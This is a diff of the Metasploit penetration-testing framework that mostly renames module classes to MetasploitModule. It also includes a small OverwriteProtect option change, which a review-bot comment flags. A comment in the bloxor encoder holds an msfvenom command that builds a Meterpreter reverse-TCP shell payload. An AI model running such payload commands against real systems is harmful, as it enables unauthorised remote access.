@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/voip/telisca_ips_lock_control.rb b/modules/auxiliary/voip/telisca_ips_lock_control.rb index 3f40c00489..690fe6c93a 100644 --- a/modules/auxiliary/voip/telisca_ips_lock_control.rb +++ b/modules/auxiliary/voip/telisca_ips_lock_control.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb b/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb index 6421fdb954..41769d2e7b 100644 --- a/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb +++ b/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary def initialize super( diff --git a/modules/auxiliary/vsploit/malware/dns/dns_query.rb b/modules/auxiliary/vsploit/malware/dns/dns_query.rb index 0a91a507cb..0cd89c9c3a 100644 --- a/modules/auxiliary/vsploit/malware/dns/dns_query.rb +++ b/modules/auxiliary/vsploit/malware/dns/dns_query.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary def initialize super( diff --git a/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb b/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb index 097746a5d4..27821cd788 100644 --- a/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb +++ b/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary def initialize super( diff --git a/modules/auxiliary/vsploit/pii/email_pii.rb b/modules/auxiliary/vsploit/pii/email_pii.rb index d68bbbdea6..bd317eb561 100644 --- a/modules/auxiliary/vsploit/pii/email_pii.rb 
+++ b/modules/auxiliary/vsploit/pii/email_pii.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # # This module sends pii via an attacker smtp machine diff --git a/modules/auxiliary/vsploit/pii/web_pii.rb b/modules/auxiliary/vsploit/pii/web_pii.rb index 2046f60300..f65a49e748 100644 --- a/modules/auxiliary/vsploit/pii/web_pii.rb +++ b/modules/auxiliary/vsploit/pii/web_pii.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # # This module acts as an compromised webserver distributing PII Data diff --git a/modules/encoders/cmd/echo.rb b/modules/encoders/cmd/echo.rb index 95911f0ded..9428e684a1 100644 --- a/modules/encoders/cmd/echo.rb +++ b/modules/encoders/cmd/echo.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder Rank = GoodRanking diff --git a/modules/encoders/cmd/generic_sh.rb b/modules/encoders/cmd/generic_sh.rb index 16e62302ef..cf565b8388 100644 --- a/modules/encoders/cmd/generic_sh.rb +++ b/modules/encoders/cmd/generic_sh.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder # Has some issues, but overall it's pretty good Rank = ManualRanking diff --git a/modules/encoders/cmd/ifs.rb b/modules/encoders/cmd/ifs.rb index 602b3508d2..431d0a54f7 100644 --- a/modules/encoders/cmd/ifs.rb +++ b/modules/encoders/cmd/ifs.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder # Below normal ranking because this will produce incorrect code a lot of # the time. diff --git a/modules/encoders/cmd/perl.rb b/modules/encoders/cmd/perl.rb index 0236e0191e..40c8ab0871 100644 --- a/modules/encoders/cmd/perl.rb +++ b/modules/encoders/cmd/perl.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder Rank = NormalRanking 
diff --git a/modules/encoders/cmd/powershell_base64.rb b/modules/encoders/cmd/powershell_base64.rb index e30a7a359a..ccadc43acf 100644 --- a/modules/encoders/cmd/powershell_base64.rb +++ b/modules/encoders/cmd/powershell_base64.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder Rank = ExcellentRanking def initialize diff --git a/modules/encoders/cmd/printf_php_mq.rb b/modules/encoders/cmd/printf_php_mq.rb index c713d4379a..d0bf51c6d7 100644 --- a/modules/encoders/cmd/printf_php_mq.rb +++ b/modules/encoders/cmd/printf_php_mq.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder # Has some issues, but overall it's pretty good # - printf(1) may not be available diff --git a/modules/encoders/generic/eicar.rb b/modules/encoders/generic/eicar.rb index 7db8116178..280389b784 100644 --- a/modules/encoders/generic/eicar.rb +++ b/modules/encoders/generic/eicar.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder # Set to ManualRanking because actually using ths encoder will # certainly destroy any possibility of a successful shell. diff --git a/modules/encoders/generic/none.rb b/modules/encoders/generic/none.rb index 6703a746d8..601c77b0ea 100644 --- a/modules/encoders/generic/none.rb +++ b/modules/encoders/generic/none.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder def initialize super( diff --git a/modules/encoders/mipsbe/byte_xori.rb b/modules/encoders/mipsbe/byte_xori.rb index dbe78d536b..f65650fdfc 100644 --- a/modules/encoders/mipsbe/byte_xori.rb +++ b/modules/encoders/mipsbe/byte_xori.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasm' -class Metasploit3 < Msf::Encoder::Xor +class MetasploitModule < Msf::Encoder::Xor Rank = NormalRanking 
diff --git a/modules/encoders/mipsbe/longxor.rb b/modules/encoders/mipsbe/longxor.rb index a0fe137c57..e1f5d061d1 100644 --- a/modules/encoders/mipsbe/longxor.rb +++ b/modules/encoders/mipsbe/longxor.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasm' -class Metasploit3 < Msf::Encoder::Xor +class MetasploitModule < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/mipsle/byte_xori.rb b/modules/encoders/mipsle/byte_xori.rb index 7492549ead..d620e9d82a 100644 --- a/modules/encoders/mipsle/byte_xori.rb +++ b/modules/encoders/mipsle/byte_xori.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasm' -class Metasploit3 < Msf::Encoder::Xor +class MetasploitModule < Msf::Encoder::Xor Rank = NormalRanking diff --git a/modules/encoders/mipsle/longxor.rb b/modules/encoders/mipsle/longxor.rb index 2e1eff8ab9..10c5a368ea 100644 --- a/modules/encoders/mipsle/longxor.rb +++ b/modules/encoders/mipsle/longxor.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasm' -class Metasploit3 < Msf::Encoder::Xor +class MetasploitModule < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/php/base64.rb b/modules/encoders/php/base64.rb index 05327a5233..ae99c2170b 100644 --- a/modules/encoders/php/base64.rb +++ b/modules/encoders/php/base64.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder Rank = GreatRanking def initialize diff --git a/modules/encoders/ppc/longxor.rb b/modules/encoders/ppc/longxor.rb index 1621e2a3e8..b497b5ee11 100644 --- a/modules/encoders/ppc/longxor.rb +++ b/modules/encoders/ppc/longxor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder::Xor +class MetasploitModule < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/ppc/longxor_tag.rb b/modules/encoders/ppc/longxor_tag.rb index b0e6a90bd2..797d9cf259 100644 --- a/modules/encoders/ppc/longxor_tag.rb +++ b/modules/encoders/ppc/longxor_tag.rb 
@@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder::Xor +class MetasploitModule < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/sparc/longxor_tag.rb b/modules/encoders/sparc/longxor_tag.rb index 34995ec80e..02759315a5 100644 --- a/modules/encoders/sparc/longxor_tag.rb +++ b/modules/encoders/sparc/longxor_tag.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder::XorAdditiveFeedback +class MetasploitModule < Msf::Encoder::XorAdditiveFeedback def initialize super( diff --git a/modules/encoders/x64/xor.rb b/modules/encoders/x64/xor.rb index 73586cccc7..fc4bcee4a1 100644 --- a/modules/encoders/x64/xor.rb +++ b/modules/encoders/x64/xor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder::Xor +class MetasploitModule < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/x86/add_sub.rb b/modules/encoders/x86/add_sub.rb index 93c6c7a014..0175313484 100644 --- a/modules/encoders/x86/add_sub.rb +++ b/modules/encoders/x86/add_sub.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder Rank = ManualRanking diff --git a/modules/encoders/x86/alpha_mixed.rb b/modules/encoders/x86/alpha_mixed.rb index 2376e6dd61..e89f4c30fa 100644 --- a/modules/encoders/x86/alpha_mixed.rb +++ b/modules/encoders/x86/alpha_mixed.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/encoder/alpha2/alpha_mixed' -class Metasploit3 < Msf::Encoder::Alphanum +class MetasploitModule < Msf::Encoder::Alphanum Rank = LowRanking def initialize diff --git a/modules/encoders/x86/alpha_upper.rb b/modules/encoders/x86/alpha_upper.rb index 0430d6f403..61703a9acb 100644 --- a/modules/encoders/x86/alpha_upper.rb +++ b/modules/encoders/x86/alpha_upper.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/encoder/alpha2/alpha_upper' -class Metasploit3 < Msf::Encoder::Alphanum +class MetasploitModule < Msf::Encoder::Alphanum Rank = LowRanking 
diff --git a/modules/encoders/x86/avoid_underscore_tolower.rb b/modules/encoders/x86/avoid_underscore_tolower.rb index 44180f5a9e..af1818e684 100644 --- a/modules/encoders/x86/avoid_underscore_tolower.rb +++ b/modules/encoders/x86/avoid_underscore_tolower.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder # This encoder has a manual ranking because it should only be used in cases # where information has been explicitly supplied, like the BufferOffset. diff --git a/modules/encoders/x86/avoid_utf8_tolower.rb b/modules/encoders/x86/avoid_utf8_tolower.rb index 238e87b60e..a90ee8a66b 100644 --- a/modules/encoders/x86/avoid_utf8_tolower.rb +++ b/modules/encoders/x86/avoid_utf8_tolower.rb @@ -88,7 +88,7 @@ require 'msf/core' # 0000004A 3401 xor al,0x1 # 0000004C 7F db 0x7F # -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder # This encoder has a manual ranking because it should only be used in cases # where information has been explicitly supplied, like the BufferOffset. diff --git a/modules/encoders/x86/bloxor.rb b/modules/encoders/x86/bloxor.rb index 52814983cd..b3ddd8612d 100644 --- a/modules/encoders/x86/bloxor.rb +++ b/modules/encoders/x86/bloxor.rb @@ -24,7 +24,7 @@ require 'rex/encoder/bloxor/bloxor' # >ruby msfvenom -p windows/meterpreter/reverse_tcp RHOST=192.168.2.2 LHOST=192.168.2.1 LPORT=80 -a x86 -e x86/bloxor -b '\x00' -f raw | ndisasm -b32 -k 128,1 - # -class Metasploit3 < Rex::Encoder::BloXor +class MetasploitModule < Rex::Encoder::BloXor # Note: Currently set to manual, bump it up to automatically get selected by the framework. # Note: BloXor by design is slow due to its exhaustive search for a solution. diff --git a/modules/encoders/x86/bmp_polyglot.rb b/modules/encoders/x86/bmp_polyglot.rb index 6c834132f4..d758825bca 100644 --- a/modules/encoders/x86/bmp_polyglot.rb +++ b/modules/encoders/x86/bmp_polyglot.rb 
@@ -177,7 +177,7 @@ class SizeCalculator end -class Metasploit4 < Msf::Encoder +class MetasploitModule < Msf::Encoder Rank = ManualRanking diff --git a/modules/encoders/x86/call4_dword_xor.rb b/modules/encoders/x86/call4_dword_xor.rb index c49f4572a9..3a2bf89737 100644 --- a/modules/encoders/x86/call4_dword_xor.rb +++ b/modules/encoders/x86/call4_dword_xor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder::Xor +class MetasploitModule < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/x86/context_cpuid.rb b/modules/encoders/x86/context_cpuid.rb index b354574539..9181b1786f 100644 --- a/modules/encoders/x86/context_cpuid.rb +++ b/modules/encoders/x86/context_cpuid.rb @@ -6,7 +6,7 @@ require 'rex/poly' require 'msf/core' -class Metasploit3 < Msf::Encoder::XorAdditiveFeedback +class MetasploitModule < Msf::Encoder::XorAdditiveFeedback # Manual ranking because the cpuid value is generated and supplied # manually... diff --git a/modules/encoders/x86/context_stat.rb b/modules/encoders/x86/context_stat.rb index 4de58d3824..c7ac475cd6 100644 --- a/modules/encoders/x86/context_stat.rb +++ b/modules/encoders/x86/context_stat.rb @@ -6,7 +6,7 @@ require 'rex/poly' require 'msf/core' -class Metasploit3 < Msf::Encoder::XorAdditiveFeedback +class MetasploitModule < Msf::Encoder::XorAdditiveFeedback # Manual ranking because the stat(2) key is generated and supplied # manually. diff --git a/modules/encoders/x86/context_time.rb b/modules/encoders/x86/context_time.rb index f5db335623..06ec12c266 100644 --- a/modules/encoders/x86/context_time.rb +++ b/modules/encoders/x86/context_time.rb @@ -6,7 +6,7 @@ require 'rex/poly' require 'msf/core' -class Metasploit3 < Msf::Encoder::XorAdditiveFeedback +class MetasploitModule < Msf::Encoder::XorAdditiveFeedback # Manual ranking because the time(2) key is generated and supplied # manually. 
diff --git a/modules/encoders/x86/countdown.rb b/modules/encoders/x86/countdown.rb index 78faa90631..d90556073a 100644 --- a/modules/encoders/x86/countdown.rb +++ b/modules/encoders/x86/countdown.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder::Xor +class MetasploitModule < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/x86/fnstenv_mov.rb b/modules/encoders/x86/fnstenv_mov.rb index f942c29eb9..685635f96a 100644 --- a/modules/encoders/x86/fnstenv_mov.rb +++ b/modules/encoders/x86/fnstenv_mov.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder::Xor +class MetasploitModule < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/x86/jmp_call_additive.rb b/modules/encoders/x86/jmp_call_additive.rb index 5a0b98d082..a0f9f7c2c0 100644 --- a/modules/encoders/x86/jmp_call_additive.rb +++ b/modules/encoders/x86/jmp_call_additive.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder::XorAdditiveFeedback +class MetasploitModule < Msf::Encoder::XorAdditiveFeedback # Uncomment when we get the poly stuff working again. #Rank = GreatRanking diff --git a/modules/encoders/x86/nonalpha.rb b/modules/encoders/x86/nonalpha.rb index b4e275351e..656adc6731 100644 --- a/modules/encoders/x86/nonalpha.rb +++ b/modules/encoders/x86/nonalpha.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/encoder/nonalpha' -class Metasploit3 < Msf::Encoder::NonAlpha +class MetasploitModule < Msf::Encoder::NonAlpha Rank = LowRanking diff --git a/modules/encoders/x86/nonupper.rb b/modules/encoders/x86/nonupper.rb index 48a261b1f7..317b07b8bc 100644 --- a/modules/encoders/x86/nonupper.rb +++ b/modules/encoders/x86/nonupper.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/encoder/nonupper' -class Metasploit3 < Msf::Encoder::NonUpper +class MetasploitModule < Msf::Encoder::NonUpper Rank = LowRanking 
diff --git a/modules/encoders/x86/opt_sub.rb b/modules/encoders/x86/opt_sub.rb index a28dbc3702..e214b9f108 100644 --- a/modules/encoders/x86/opt_sub.rb +++ b/modules/encoders/x86/opt_sub.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder Rank = ManualRanking @@ -52,7 +52,7 @@ class Metasploit3 < Msf::Encoder register_options( [ OptString.new( 'ValidCharSet', [ false, "Specify a known set of valid chars (ALPHA, ALPHANUM, FILEPATH)" ]), - OptBool.new( 'OverwriteProtect', [ false, "Indicate if the encoded payload requires protection against being overwritten" ]) + OptBool.new( 'OverwriteProtect', [ false, "Indicate if the encoded payload requires protection against being overwritten", false]) ], self.class) end @@ -179,10 +179,8 @@ class Metasploit3 < Msf::Encoder raise EncodingError, "Unable to find AND-able chars resulting 0 in the valid character set." end - protect_payload = (datastore['OverwriteProtect'] || "").downcase == "true" - # with everything set up, we can now call the encoding routine - state.decoder_stub = encode_payload(state.buf, reg_offset, protect_payload) + state.decoder_stub = encode_payload(state.buf, reg_offset, datastore['OverwriteProtect']) state.buf = "" state.decoder_stub diff --git a/modules/encoders/x86/shikata_ga_nai.rb b/modules/encoders/x86/shikata_ga_nai.rb index 14487f60bc..76ff8908c9 100644 --- a/modules/encoders/x86/shikata_ga_nai.rb +++ b/modules/encoders/x86/shikata_ga_nai.rb @@ -8,7 +8,7 @@ require 'rex/poly' require 'msf/core' -class Metasploit3 < Msf::Encoder::XorAdditiveFeedback +class MetasploitModule < Msf::Encoder::XorAdditiveFeedback # The shikata encoder has an excellent ranking because it is polymorphic. # Party time, excellent! diff --git a/modules/encoders/x86/single_static_bit.rb b/modules/encoders/x86/single_static_bit.rb index e4bb69f6d1..3cc1976a5c 100644 --- a/modules/encoders/x86/single_static_bit.rb +++ b/modules/encoders/x86/single_static_bit.rb 
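Review bot: In the last opt_sub.rb hunk, `datastore['OverwriteProtect']` is now passed straight to `encode_payload`, which is only correct if the datastore always returns a real boolean for an `OptBool`. If the raw string can still come through (not visible here), `"false"` is truthy in Ruby and overwrite protection would be switched on against the user's setting. Either confirm that normalization happens on assignment, or coerce explicitly with `protect_payload = datastore['OverwriteProtect'].to_s.downcase == 'true'`. A one-line comment stating which type `encode_payload` expects for its third argument would also help, since the enclosing method starts outside the hunk.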
@@ -12,7 +12,7 @@ require 'msf/core' # The decoder has been tested with all possible values, but the decoder stub # is was not designed to bypass restrictions other than "bit 5 must be on".. # -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder # This encoder has a manual ranking because it should only be used in cases # where information has been explicitly supplied, specifically diff --git a/modules/encoders/x86/unicode_mixed.rb b/modules/encoders/x86/unicode_mixed.rb index 255f7f21d4..d33c46b153 100644 --- a/modules/encoders/x86/unicode_mixed.rb +++ b/modules/encoders/x86/unicode_mixed.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/encoder/alpha2/unicode_mixed' -class Metasploit3 < Msf::Encoder::Alphanum +class MetasploitModule < Msf::Encoder::Alphanum Rank = ManualRanking diff --git a/modules/encoders/x86/unicode_upper.rb b/modules/encoders/x86/unicode_upper.rb index 821d6f5c92..d04c1b4bf6 100644 --- a/modules/encoders/x86/unicode_upper.rb +++ b/modules/encoders/x86/unicode_upper.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/encoder/alpha2/unicode_upper' -class Metasploit3 < Msf::Encoder::Alphanum +class MetasploitModule < Msf::Encoder::Alphanum Rank = ManualRanking diff --git a/modules/exploits/aix/local/ibstat_path.rb b/modules/exploits/aix/local/ibstat_path.rb index 18f91d7ec9..f1b171b225 100644 --- a/modules/exploits/aix/local/ibstat_path.rb +++ b/modules/exploits/aix/local/ibstat_path.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking diff --git a/modules/exploits/aix/rpc_cmsd_opcode21.rb b/modules/exploits/aix/rpc_cmsd_opcode21.rb index ad11665a90..cae0405028 100644 --- a/modules/exploits/aix/rpc_cmsd_opcode21.rb +++ b/modules/exploits/aix/rpc_cmsd_opcode21.rb 
@@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/aix/rpc_ttdbserverd_realpath.rb b/modules/exploits/aix/rpc_ttdbserverd_realpath.rb index 3e8a17e173..758de4da37 100644 --- a/modules/exploits/aix/rpc_ttdbserverd_realpath.rb +++ b/modules/exploits/aix/rpc_ttdbserverd_realpath.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/android/adb/adb_server_exec.rb b/modules/exploits/android/adb/adb_server_exec.rb index d1d13e601c..bc9e5eeefa 100644 --- a/modules/exploits/android/adb/adb_server_exec.rb +++ b/modules/exploits/android/adb/adb_server_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/adb' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/android/browser/samsung_knox_smdm_url.rb b/modules/exploits/android/browser/samsung_knox_smdm_url.rb index 5b3c906329..6eb7887d6f 100644 --- a/modules/exploits/android/browser/samsung_knox_smdm_url.rb +++ b/modules/exploits/android/browser/samsung_knox_smdm_url.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'digest/md5' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index 5da4b1aabc..8154bd8d76 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb 
@@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/android' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb b/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb index 1ac2e4a2b6..3440245813 100644 --- a/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb +++ b/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb @@ -8,7 +8,7 @@ require 'msf/core/exploit/fileformat' require 'msf/core/exploit/pdf' require 'msf/core/exploit/android' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/android/local/futex_requeue.rb b/modules/exploits/android/local/futex_requeue.rb index 204bf8af5b..68d170b452 100644 --- a/modules/exploits/android/local/futex_requeue.rb +++ b/modules/exploits/android/local/futex_requeue.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File diff --git a/modules/exploits/apple_ios/browser/safari_libtiff.rb b/modules/exploits/apple_ios/browser/safari_libtiff.rb index 1217a5735b..79316f8a10 100644 --- a/modules/exploits/apple_ios/browser/safari_libtiff.rb +++ b/modules/exploits/apple_ios/browser/safari_libtiff.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking # diff --git a/modules/exploits/apple_ios/email/mobilemail_libtiff.rb b/modules/exploits/apple_ios/email/mobilemail_libtiff.rb index 99882d452c..25d7a2c2e1 100644 --- a/modules/exploits/apple_ios/email/mobilemail_libtiff.rb +++ b/modules/exploits/apple_ios/email/mobilemail_libtiff.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking # diff --git a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb index 2b6fdc0353..8b0143ea98 100644 --- a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb +++ b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::CommandShell diff --git a/modules/exploits/bsdi/softcart/mercantec_softcart.rb b/modules/exploits/bsdi/softcart/mercantec_softcart.rb index 6fe5362b96..a7c3cca617 100644 --- a/modules/exploits/bsdi/softcart/mercantec_softcart.rb +++ b/modules/exploits/bsdi/softcart/mercantec_softcart.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Brute diff --git a/modules/exploits/dialup/multi/login/manyargs.rb b/modules/exploits/dialup/multi/login/manyargs.rb index c4d398710d..7cef87bd46 100644 --- a/modules/exploits/dialup/multi/login/manyargs.rb +++ b/modules/exploits/dialup/multi/login/manyargs.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Dialup diff --git a/modules/exploits/firefox/local/exec_shellcode.rb b/modules/exploits/firefox/local/exec_shellcode.rb index 043290fb83..ebd888f488 100644 --- a/modules/exploits/firefox/local/exec_shellcode.rb +++ b/modules/exploits/firefox/local/exec_shellcode.rb 
@@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/payload/firefox' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local include Msf::Payload::Firefox include Msf::Exploit::Remote::FirefoxPrivilegeEscalation diff --git a/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb b/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb index d7382725c1..9e103542ab 100644 --- a/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb +++ b/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/freebsd/http/watchguard_cmd_exec.rb b/modules/exploits/freebsd/http/watchguard_cmd_exec.rb index 6a352d7bab..53e1d628aa 100644 --- a/modules/exploits/freebsd/http/watchguard_cmd_exec.rb +++ b/modules/exploits/freebsd/http/watchguard_cmd_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/freebsd/local/mmap.rb b/modules/exploits/freebsd/local/mmap.rb index e16a64a85c..8756789024 100644 --- a/modules/exploits/freebsd/local/mmap.rb +++ b/modules/exploits/freebsd/local/mmap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::EXE diff --git a/modules/exploits/freebsd/local/watchguard_fix_corrupt_mail.rb b/modules/exploits/freebsd/local/watchguard_fix_corrupt_mail.rb index aa6f165b1b..bca3e3b626 100644 --- a/modules/exploits/freebsd/local/watchguard_fix_corrupt_mail.rb +++ b/modules/exploits/freebsd/local/watchguard_fix_corrupt_mail.rb 
@@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local # It needs 3 minutes wait time # WfsDelay set to 180, so it should be a Manual exploit, # to avoid it being included in automations diff --git a/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb b/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb index 4bd783ad7b..77e8021592 100644 --- a/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb +++ b/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -131,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote EOS - print_status("#{peer} - Sending soap request...") + print_status("Sending soap request...") send_request_cgi({ 'method' => 'POST', diff --git a/modules/exploits/freebsd/samba/trans2open.rb b/modules/exploits/freebsd/samba/trans2open.rb index 56bb341327..b954027c17 100644 --- a/modules/exploits/freebsd/samba/trans2open.rb +++ b/modules/exploits/freebsd/samba/trans2open.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/freebsd/tacacs/xtacacsd_report.rb b/modules/exploits/freebsd/tacacs/xtacacsd_report.rb index c2b302d0a0..d58dd31fc0 100644 --- 